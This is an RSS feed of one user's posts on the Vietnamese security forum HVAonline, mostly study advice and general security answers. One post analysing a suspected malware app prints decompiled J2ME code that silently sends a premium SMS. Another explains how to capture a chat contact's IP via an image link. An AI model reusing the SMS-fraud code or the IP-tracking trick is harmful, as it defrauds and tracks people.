<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Messages posted by "BlueMM"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/listByUser/256654.hva</link>
		<description><![CDATA[Messages posted by "BlueMM"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Việc làm cho sinh viê mới ra trường khi làm lĩnh vực Sysadmin</title>
				<description><![CDATA[ Em đang là sv Đh năm 3, vừa học môn hệ điều hành mã nguồn mở xong, em xin được trả lời câu hỏi của bác Quanta.

[] tức là phép OR, nhưng chỉ có 1 kí tự thì không có ý nghĩa, phải từ 2 kí tự trở lên chẳng hạn như [Hh]ttpd tức là tìm với "Http" hoặc "http" .]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44813/276401.hva#276401</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44813/276401.hva#276401</link>
				<pubDate><![CDATA[Fri, 7 Jun 2013 07:47:46]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>NhacCuaTui vs TTPlayer ?</title>
				<description><![CDATA[ @audjtranjack

Xin lỗi bạn nhé, người VN vô cùng ghét bọn China, trong lịch sử chống giặc ngoại xâm của dân tộc, thì người VN chống China là chủ yếu.
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44816/276324.hva#276324</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44816/276324.hva#276324</link>
				<pubDate><![CDATA[Tue, 4 Jun 2013 07:00:35]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>NhacCuaTui vs TTPlayer ?</title>
				<description><![CDATA[ Có khi nào nó được build trên cùng một máy không ta, đám này chắc cùng hội cùng thuyền, không ngờ thế lực ngầm của baidu lại lớn đến thế.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44816/276319.hva#276319</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44816/276319.hva#276319</link>
				<pubDate><![CDATA[Tue, 4 Jun 2013 05:45:07]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Dịch ngược APK để so sánh WeChat và Zalo</title>
				<description><![CDATA[ Có ai có hứng thú phân tích BKAV cho android không, mình đang tìm hiểu mà vẫn không hiểu thuật toán quét virus của nó thế nào :(]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44782/276166.hva#276166</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44782/276166.hva#276166</link>
				<pubDate><![CDATA[Thu, 30 May 2013 22:21:05]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Cách thức login vào một website từ một ứng dụng winform ?</title>
				<description><![CDATA[ Cái phần mềm dropbox đó nó gửi username và password bạn lên server của nó, server kiểm tra thấy hợp lệ thì thiết lập session cho IP bạn. Bạn mở trình duyệt web ra vào trang dropbox, nó thấy trùng IP với IP đã thiết lập session trước đó thì nó cho vào thẳng luôn mà không cần nhập lại username và password

Còn giao thức nó là gì thì mình không biết được, nếu giao thức mã hóa như HTTPS, SSL thì cũng tương đối an toàn.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44587/274975.hva#274975</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44587/274975.hva#274975</link>
				<pubDate><![CDATA[Tue, 16 Apr 2013 04:33:17]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Mua laptop đi học</title>
				<description><![CDATA[ Mình đang xài Dell Inspiron đời 2011,  sau 1 năm là hư ổ cứng mất một đống dữ liệu, pin giờ xài được 20 phút là hết. 

Dân IT chuyên lập trình thì không cần card đồ hoạ khủng làm gì, chỉ có tốn pin nóng máy thôi. Còn muốn chơi game thì đừng xài laptop.

Mai mốt có tiền đổi sang macbook là hay nhất:D]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/43340/274927.hva#274927</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/43340/274927.hva#274927</link>
				<pubDate><![CDATA[Sun, 14 Apr 2013 01:16:47]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Vấn đề Auto Longin vào 1 trang web....</title>
				<description><![CDATA[ Tìm hiểu về GET và POST trong giao thức HTTP, nó GET hoặc POST lên 4share.vn, nếu đúng user và pass thì 4share sẽ khởi tạo session, việc tiếp theo là wwwect qua 4share.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44546/274772.hva#274772</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44546/274772.hva#274772</link>
				<pubDate><![CDATA[Sun, 7 Apr 2013 22:52:19]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Viettel có liên quan đến việc phát tán malware?</title>
				<description><![CDATA[ 2 link đầu đều bị anti virus kill ngay tức khắc. Bạn có thể dùng<span class="link"> http://java.decompiler.free.fr/?q=jdgui</span> để xem mã nguồn của chúng. Đây là mã nguồn của file XemClip.jar:

Có vẻ nó sẽ gửi DC1 đến số 6731, và bạn sẽ mất 15k trong tài khoản.

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>package main;

import java.io.PrintStream;
import javax.microedition.io.Connector;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;

final class b extends Thread
{
  private final c a;

  b&#40;c paramc&#41;
  {
    this.a = paramc;
  }

  public final void run&#40;&#41;
  {
    try
    {
      Thread.sleep&#40;700L&#41;;
      int i = -1;
      String str2 = "6731";
      String str1 = "DC1";
      System.out.println&#40;"SMS: " + str1 + " To: " + str2&#41;;
      if &#40;&#40;str2 == null&#41; || &#40;"".equals&#40;str2.trim&#40;&#41;&#41;&#41;&#41;
        throw new IllegalArgumentException&#40;"Phone number is invalid"&#41;;
      MessageConnection localMessageConnection;
      TextMessage localTextMessage;
      &#40;localTextMessage = &#40;TextMessage&#41;&#40;localMessageConnection = &#40;MessageConnection&#41;Connector.open&#40;str2 = "sms://" + str2&#41;&#41;.newMessage&#40;"text"&#41;&#41;.setAddress&#40;str2&#41;;
      localTextMessage.setPayloadText&#40;str1&#41;;
      localMessageConnection.send&#40;localTextMessage&#41;;
      try
      {
        if &#40;localMessageConnection != null&#41;
          localMessageConnection.close&#40;&#41;;
      }
      catch &#40;Exception localException1&#41;
      {
      }
      this.a.a.switchDisplayable&#40;null, new a&#40;this.a.a&#41;&#41;;
      return;
    }
    catch &#40;Exception localException2&#41;
    {
      this.a.a.notifyDestroyed&#40;&#41;;
    }
  }
}</pre>
		</div>

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>package main;

final class d extends Thread
{
  private final a a;

  d&#40;a parama&#41;
  {
    this.a = parama;
  }

  public final void run&#40;&#41;
  {
    try
    {
      Thread.sleep&#40;1000L&#41;;
      this.a.a.platformRequest&#40;"http://xclip.vn"&#41;;
      return;
    }
    catch &#40;Exception localException&#41;
    {
      this.a.a.notifyDestroyed&#40;&#41;;
    }
  }
}</pre>
		</div>

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44495/274534.hva#274534</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44495/274534.hva#274534</link>
				<pubDate><![CDATA[Sat, 30 Mar 2013 05:07:47]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Các bậc tiền bối định hướng giúp mình về lập trình chuyên ngành</title>
				<description><![CDATA[ 1. Ở VN toàn dùng C# và Java để làm phần mềm thôi, vì nó làm giao diện rất nhanh, chứ làm C thì hơi cực. Với lại tốc độ xử lý máy tính giờ cũng nhanh rồi, không cần phải viết bằng mã cấp thấp như hồi xưa nữa.
2. Mình bắt đầu học thuật toán trước, ngôn ngữ không quan trọng, và cần phải có quá trình lâu dài.
Trình tự học là: thuật toán (ngôn ngữ C) - quan trọng, sau đó dùng C# hoặc Java để làm phần mềm.
Nếu bạn cần trợ giúp thì có thể liên hệ mình, hiện tại mình gần ra trường, cần có vài project cụ thể để nghiên cứu làm khoá luận và tích luỹ kinh nghiệm, và chắc chắn sẽ tiết kiệm thời gian + chi phí nếu bạn thuê lập trình viên bên ngoài.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44435/274441.hva#274441</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44435/274441.hva#274441</link>
				<pubDate><![CDATA[Wed, 27 Mar 2013 10:44:22]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>dịch ngược password đã bị băm.</title>
				<description><![CDATA[ Các kí tự được kết thúc bằng các kí tự <font color='red'>= </font> thường là base64, kết quả giải mã ra không nhất thiết phải là các kí tự đọc được, người ta vẫn hay base64 các file nhị phân để gửi qua email đó thôi.
Bạn hackerbeyeu cũng vui lòng cung cấp thuật toán (mã giả) để dịch ngược MD5 được không, mình lấy làm đồ án bảo mật hệ thống thông tin chắc sẽ gây sốc với giáo viên :D]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/40697/273937.hva#273937</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/40697/273937.hva#273937</link>
				<pubDate><![CDATA[Thu, 7 Mar 2013 03:19:52]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Cao thủ nào dò ra IP sever của apple giúp em</title>
				<description><![CDATA[ Mình có xem mấy phim của USA, máy chủ của bộ quốc phòng, CIA, NSA còn bị tấn công, bạn thử đi hỏi đạo diễn mấy phim đó xem, chúc may mắn]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44165/272964.hva#272964</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44165/272964.hva#272964</link>
				<pubDate><![CDATA[Wed, 23 Jan 2013 07:33:48]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Một số kỹ năng xây dựng trang web chống hack sql injection</title>
				<description><![CDATA[ Đơn giản chỉ là kiểm tra dữ liệu input, lọc bỏ các kí tự đặc biệt có thể gây ra lỗi.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/43741/272471.hva#272471</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/43741/272471.hva#272471</link>
				<pubDate><![CDATA[Sat, 5 Jan 2013 04:35:37]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>làm cách nào chống hacker xâm nhập và hacker tài khoản gmail</title>
				<description><![CDATA[ Gmail cho phép kích hoạt xác minh qua điện thoại đó bạn, mỗi khi đăng nhập, Google sẽ gửi cho mình 1 mã số vào điện thoại của mình, dùng mã số đó để xác minh. Nếu không có điện thoại thì không thể đăng nhập được.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/43661/272463.hva#272463</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/43661/272463.hva#272463</link>
				<pubDate><![CDATA[Fri, 4 Jan 2013 21:07:17]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Phòng chống cain and abel</title>
				<description><![CDATA[ Không thể chống được, chỉ có cách là xài mạng khác. Đối với các thông tin nhạy cảm thì luôn luôn phải xài các giao thức HTTPS, SSL,...]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/44048/272294.hva#272294</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/44048/272294.hva#272294</link>
				<pubDate><![CDATA[Mon, 31 Dec 2012 01:02:31]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Giả mã pass</title>
				<description><![CDATA[ bồ cần có ít nhất 1 siêu máy tính có tốc độ vài ngàn teraflop, sau đó có thể dùng brute force để giải]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/43946/272210.hva#272210</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/43946/272210.hva#272210</link>
				<pubDate><![CDATA[Thu, 27 Dec 2012 23:46:18]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Kết nối lạ khi dùng ZTE Dcom 3G Viettel</title>
				<description><![CDATA[ Mình cũng thấy quá nhiều kết nối, mình chẳng rành lắm, không  biết cái nào tốt, cái nào xấu :(]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/43681/271854.hva#271854</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/43681/271854.hva#271854</link>
				<pubDate><![CDATA[Fri, 14 Dec 2012 23:19:17]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>HVA News - ZTE thừa nhận có backdoor trong thiết bị Android của họ</title>
				<description><![CDATA[ Em đang xài USB 3G của Huawei, mấy bác HVA thử phân tích xem nó có backdoor hay không, cần phải có nghiên cứu cụ thể để chứng minh mới được.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/42393/270113.hva#270113</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/42393/270113.hva#270113</link>
				<pubDate><![CDATA[Fri, 12 Oct 2012 06:15:16]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Đại học BK hay KHTN? Cao thủ tư vấn giúp em</title>
				<description><![CDATA[ Trường nào cũng vậy thôi, vào học mới biết chán, mình học tới năm 3 rồi mà chẳng hiểu cái gì, họ chẳng dạy mình làm hacker, toàn mấy thuật toán, định lý :(]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/43057/268373.hva#268373</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/43057/268373.hva#268373</link>
				<pubDate><![CDATA[Mon, 13 Aug 2012 04:47:42]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Dịch vụ của Baibu tại VN TTPlayer và hao123 client có thể là malware ?</title>
				<description><![CDATA[ Báo Tuổi Trẻ ngày 8/7/2012:
<span class="link"> http://nhipsongso.tuoitre.vn/Nhip-song-so/500754/Baidu-can-thiep-trai-phep-vao-may-tinh-o-VN.html</span>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/42784/266399.hva#266399</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/42784/266399.hva#266399</link>
				<pubDate><![CDATA[Sun, 8 Jul 2012 00:47:19]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>PostgreSQL vs Oracle</title>
				<description><![CDATA[ Thầy mình nói MySQL và PostgreSQL dỏm hơn MS SQL server, và MS SQL server lại dỏm hơn Oracle. Cái nào càng đắt tiền thì càng xịn, không biết có đúng không nữa :(]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/42605/265580.hva#265580</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/42605/265580.hva#265580</link>
				<pubDate><![CDATA[Mon, 25 Jun 2012 09:20:25]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>có ai có source code của 4.2BSD không?</title>
				<description><![CDATA[ Ubuntu còn có Xubuntu, Kubuntu, Edubuntu, Lubuntu,... mà :D
Mình nghĩ ý của bạn panfider chỉ là thay đổi giao diện và các gói liên quan chứ không phải viết lại kernel.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/42615/264994.hva#264994</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/42615/264994.hva#264994</link>
				<pubDate><![CDATA[Sun, 10 Jun 2012 21:04:38]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Giúp em về các công cụ passive</title>
				<description><![CDATA[ Mình cũng đang sv năm 2 ngành CNTT đây, năm 2 thì học tới mấy thuật toán trong lý thuyết đồ thị, cấu trúc dữ liệu, ... chứ không có cái gì liên quan đến security cả]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/41872/261120.hva#261120</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/41872/261120.hva#261120</link>
				<pubDate><![CDATA[Mon, 9 Apr 2012 23:43:50]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>cơ chế lưu pass của yahoo 11.x</title>
				<description><![CDATA[ Pass của yahoo được lưu trong registry, theo mình nó dùng thuật toán mã hoá bất đối xứng. Do đó ta không thể "crack" được nếu không có private key của Yahoo]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/41828/260907.hva#260907</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/41828/260907.hva#260907</link>
				<pubDate><![CDATA[Thu, 5 Apr 2012 23:49:43]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Bắt đầu học lập trình với AutoIT, hợp lý hay không?</title>
				<description><![CDATA[ Học C/C++ là tốt nhất, hầu hết các trường ĐH ở VN đều lấy C/C++ làm nền tảng. Tuy nhiên ngôn ngữ chỉ là nhất thời, tư duy lập trình mới là mãi mãi :D]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/41786/260411.hva#260411</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/41786/260411.hva#260411</link>
				<pubDate><![CDATA[Fri, 30 Mar 2012 07:39:43]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>tự học thiết kế web bắt đầu từ đâu</title>
				<description><![CDATA[ Theo mình cần phân biệt <font color='orange'>thiết kế web</font> và <font color='orange'>lập trình web</font>
 - Thiết kế web (web design): mình thấy người ta dùng photoshop hoặc các phần mềm chuyên dụng khác để vẽ ra giao diện, mà chẳng cần biết ngôn ngữ lập trình nào cả.
 - Lập trình web:<span class="link"> http://www.hvaonline.net/hvaonline/posts/list/28372.hva</span>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/41016/258602.hva#258602</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/41016/258602.hva#258602</link>
				<pubDate><![CDATA[Wed, 14 Mar 2012 01:02:01]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Phiên bản linux nào tốt nhất trong việc học và nghiên cứu</title>
				<description><![CDATA[ lúc trước mình xài ubuntu từ phiên bản 7.10 đến 10.10 trên desktop chạy khá tốt, nhưng từ hồi chuyển sang laptop, ubuntu và các bản phân phối khác chạy quá nóng.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/41371/256589.hva#256589</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/41371/256589.hva#256589</link>
				<pubDate><![CDATA[Thu, 1 Mar 2012 20:15:32]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>xác định ip của bạn chat như thế nào qua yahoo messenger?</title>
				<description><![CDATA[ Hoàn toàn có thể xác định được IP của đối tượng dùng Y!M, cách này là do bạn của mình nói lại cho mình.
Khi ta gửi link 1 file ảnh cho đối tượng, ngay lập tức hình ảnh đó được hiển thị ngay trên cửa số chat, như vậy từ máy của đối tượng đã kết nối tới host chứa tấm hình đó để lấy tấm hình về.
Vậy nếu máy bạn là host luôn thì hoàn toàn bạn có thể xác định IP của đối tượng, bằng cách gửi cho đối tượng link của 1 tấm hình,
<span class="link"> 127.0.0.1:80/file.png </span>
127.0.0.1 ở đây mang ý nghĩa tượng trưng thôi nhé, thay nó bằng IP của bạn trên mạng. 
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/39494/255492.hva#255492</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/39494/255492.hva#255492</link>
				<pubDate><![CDATA[Sat, 25 Feb 2012 09:50:58]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
			<item>
				<title>Ai biết về lập trình Asembly cho vxl cho mình hỏi chút</title>
				<description><![CDATA[ Tôi đoán bạn đang học môn kiến trúc máy tính trong chương trình đại học. Chịu khó đọc sách nhiều vào, chứ không ai giúp bạn giỏi được cả.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/41327/255443.hva#255443</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/41327/255443.hva#255443</link>
				<pubDate><![CDATA[Sat, 25 Feb 2012 06:04:27]]> GMT</pubDate>
				<author><![CDATA[ BlueMM]]></author>
			</item>
	</channel>
</rss>
